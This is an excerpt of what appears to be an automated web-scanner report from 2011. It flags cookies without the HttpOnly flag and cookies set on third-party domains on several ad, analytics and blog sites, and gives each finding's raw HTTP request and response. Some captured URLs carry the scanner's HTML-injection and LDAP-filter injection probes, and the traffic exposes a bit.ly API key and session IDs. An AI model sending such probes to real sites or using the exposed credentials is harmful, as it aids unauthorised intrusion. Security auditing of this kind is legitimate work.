var AAMB1='<!-- Javascript tag -->\r\n<!-- begin ZEDO for channel: Whitepages.com ROS , publisher: Whitepages.com , Ad Dimension: Super Banner - 728 x 90 -->\r\n<script language=\"JavaScript\">\r\nva ...[SNIP]...
AA002=1294100002-3786607; expires=Mon, 31 Jan 2011 01:40:41 GMT; path=/; domain=atl.whitepages.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET //AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607 HTTP/1.1 Host: atl.whitepages.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; AA002=0-0
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86) Date: Sun, 30 Jan 2011 01:40:41 GMT X-DirectServer: whitepg_DS0 Content-Type: application/x-javascript Content-Length: 13325 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=0007062FC1990D44493592EB61626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com Set-Cookie: LE0=+6jd3r4Zf10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com Set-Cookie: LE1=+6jd3raaa10014+9qUEKJ8I6004G+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com Set-Cookie: LE3=+6jd3r4Wa10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com Set-Cookie: LE4=+6jd3rKba10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com Set-Cookie: AA002=1294100002-3786607; expires=Mon, 31 Jan 2011 01:40:41 GMT; path=/; domain=atl.whitepages.com P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
var AAMB1='<!-- Javascript tag -->\r\n<!-- begin ZEDO for channel: Whitepages.com ROS , publisher: Whitepages.com , Ad Dimension: Super Banner - 728 x 90 -->\r\n<script language=\"JavaScript\">\r\nva ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1 Host: atl.whitepages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86) Date: Sun, 30 Jan 2011 17:50:18 GMT X-DirectServer: whitepg_DS2 Content-Type: application/x-javascript Content-Length: 11959 Pragma: no-cache Cache-control: no-cache Set-Cookie: LE1=+65y4r4Ya10038+9KmJKJII6004G+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com Set-Cookie: LE3=+65y4r4Wa10024+9KmJKJ-V6004G+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com Set-Cookie: LE4=+65y4rKba10024+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
var AAMB1='<!-- Javascript tag -->\r\n<!-- begin ZEDO for channel: Whitepages.com ROS , publisher: Whitepages.com , Ad Dimension: Super Banner - 728 x 90 -->\r\n<script language=\"JavaScript\">\r\nva ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1 Host: atl.whitepages.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
Response
HTTP/1.1 302 Moved Temporarily Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86) Date: Sun, 30 Jan 2011 01:29:40 GMT X-DirectServer: whitepg_DS4 Content-Length: 0 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com Set-Cookie: AA002=0-0; expires=Sun, 30 Jan 2011 01:30:40 GMT; path=/; domain=atl.whitepages.com P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close Location: http://redcated/PTR/jview/240321567/direct;wi.1;hi.1/01?relocate=http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1 Host: atl.whitepages.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D
Response
HTTP/1.1 302 Moved Temporarily Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86) Date: Sun, 30 Jan 2011 01:29:40 GMT X-DirectServer: whitepg_DS5 Content-Length: 0 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close Location: /LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?rn=1296343586482&c7=http%3A%2F%2Fwww.redacted%2F&c1=2&c2=3000001 HTTP/1.1 Accept: */* Referer: http://www.redacted/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: b.scorecardresearch.com Proxy-Connection: Keep-Alive Cookie: UID=5d4473db-24.143.206.162-1293844712
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sat, 29 Jan 2011 23:26:31 GMT Connection: close Set-Cookie: UID=5d4473db-24.143.206.162-1293844712; expires=Mon, 28-Jan-2013 23:26:31 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r?c2=3000001&d.c=gif&d.o=msnbcom&d.x=212602874&d.t=page&d.u=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2Fad5b7d32bfbc5f43%29%28sn%3D*%2F5942494-double-whammy-on-the-sun%3Fgt1%3D43001&d.r=http%3A%2F%2Fburp%2Fshow%2F3 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 30 Jan 2011 01:19:41 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 29-Jan-2013 01:19:41 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=4&c2=p85001580&c3=58087454&c4=40401740&c5=1&c6=39&c7=wed%20jan%2026%2020%3A14%3A29%202011&c8=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN3867.270604.B3%2FB5128597.7%3Bsz%3D728x90%3Bclick0%3Dhttp%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000730461%2Fmnum%3D0000950192%2Fcstr%3D12110217%3D_4d44bf07%2C6566708061%2C730461_950192_1183_0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D12110217%2Foptn%3D64%3Ftrg%3Dhttp%3A%2F%2Fb3.mookie1.com%2FRealMedia%2Fads%2Fclick_lx.ads%2FAOLB3%2FRadioShack%2FSELL_2011Q1%2FCPA%2F728%2FL36%2F860849269%2Fx90%2FUSNetwork%2FRS_SELL_2011Q1_AOL_CPA_728%2FRadioShack_SELL_2011Q1.html%2F72634857383030695a694d41416f6366%3F%3Bord%3D860849269%3F&c9=Advertisement&c10=http%3A%2F%2Fmsn.whitepages.com%2F&c15=&1296351004927 HTTP/1.1 Host: b.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; UID=1d29d89e-72.246.30.75-1294456810; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_G=method->-1,ts->1296351006; BMX_3PC=1
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sun, 30 Jan 2011 01:30:06 GMT Connection: close Set-Cookie: UID=1d29d89e-72.246.30.75-1294456810; expires=Tue, 29-Jan-2013 01:30:06 GMT; path=/; domain=.voicefive.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:29:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3183 Content-Type: application/x-javascript Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/
The following cookie was issued by the application and does not have the HttpOnly flag set:
_xsrf=9d5ed86efd7f475d985ae3585609dd41; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /javascript-api.js?version=1.02&login=sciam&apiKey=R_4f0af26579dbeb7e65abbf25664a9b49&history=1 HTTP/1.1 Host: bit.ly Proxy-Connection: keep-alive Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
if (typeof(BitlyApi) == 'undefined') var BitlyApi = {}; // BitlyApi namespace. You sholdn't need to access methods here. Instead, use an instance of BitlyApiClient().
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/delay/archive/2011/01/27/sudo-localize-amp-amp-make-me-a-sandwich-free-pseudolocalizer-class-makes-it-easy-for-anyone-to-identify-potential-localization-issues-in-net-applications.aspx HTTP/1.1 Host: blogs.msdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 Telligent-Evolution: 5.5.134.13807 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+29+Jan+2011+23%3a22%3a07+GMT; expires=Sun, 29-Jan-2012 23:22:07 GMT; path=/ Set-Cookie: CommunityServer-LastVisitUpdated-1001=; path=/ P3P: CP="DSP CUR OTPi IND OTRi ONL FIN P3P: CP="DSP CUR OTPi IND OTRi ONL FIN X-Pingback: http://blogs.msdn.com/b/delay/pingback.aspx X-AspNet-Version: 2.0.50727 Set-Cookie: AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; expires=Sun, 30-Jan-2011 23:22:07 GMT; path=/ X-Powered-By: ASP.NET server: VBDNET01 Date: Sat, 29 Jan 2011 23:22:07 GMT Content-Length: 75605
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:40:58 GMT; expires=Sun, 29-Jan-2012 23:40:58 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ScriptResource.axd HTTP/1.1 Host: blogs.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:02 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 315 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:40:58 GMT; expires=Sun, 29-Jan-2012 23:40:58 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:40:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:40:55 GMT; expires=Sun, 29-Jan-2012 23:40:55 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /WebResource.axd HTTP/1.1 Host: blogs.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:02 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 315 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:40:55 GMT; expires=Sun, 29-Jan-2012 23:40:55 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:40:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /showcasehosted/ HTTP/1.1 Host: blogs.silverlight.net Proxy-Connection: keep-alive Referer: http://www.silverlight.net/showcase/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/learn/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /showcasehosted/default.aspx HTTP/1.1 Host: blogs.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:02 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 8701 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:40:31 GMT; expires=Sun, 29-Jan-2012 23:40:31 GMT; path=/ Set-Cookie: CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; expires=Sun, 30-Jan-2011 00:00:31 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:40:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><meta http-equiv="X-UA-C ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:59 GMT; expires=Sun, 29-Jan-2012 23:22:59 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /showcasehosted/resources/services/BasicService.svc/GetAdvertisements HTTP/1.1 Host: blogs.silverlight.net Proxy-Connection: keep-alive Referer: http://blogs.silverlight.net/showcasehosted/ Origin: http://blogs.silverlight.net Content-Type: application/json; charset=UTF-8 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:47 GMT; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e Content-Length: 0
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 412 Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:59 GMT; expires=Sun, 29-Jan-2012 23:22:59 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:22:59 GMT
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:00 GMT; expires=Sun, 29-Jan-2012 23:23:00 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /showcasehosted/resources/services/BasicService.svc/GetCountries HTTP/1.1 Host: blogs.silverlight.net Proxy-Connection: keep-alive Referer: http://blogs.silverlight.net/showcasehosted/ Origin: http://blogs.silverlight.net Content-Type: application/json; charset=UTF-8 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:59 GMT Content-Length: 0
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9070 Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:00 GMT; expires=Sun, 29-Jan-2012 23:23:00 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:23:01 GMT
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:02 GMT; expires=Sun, 29-Jan-2012 23:23:02 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
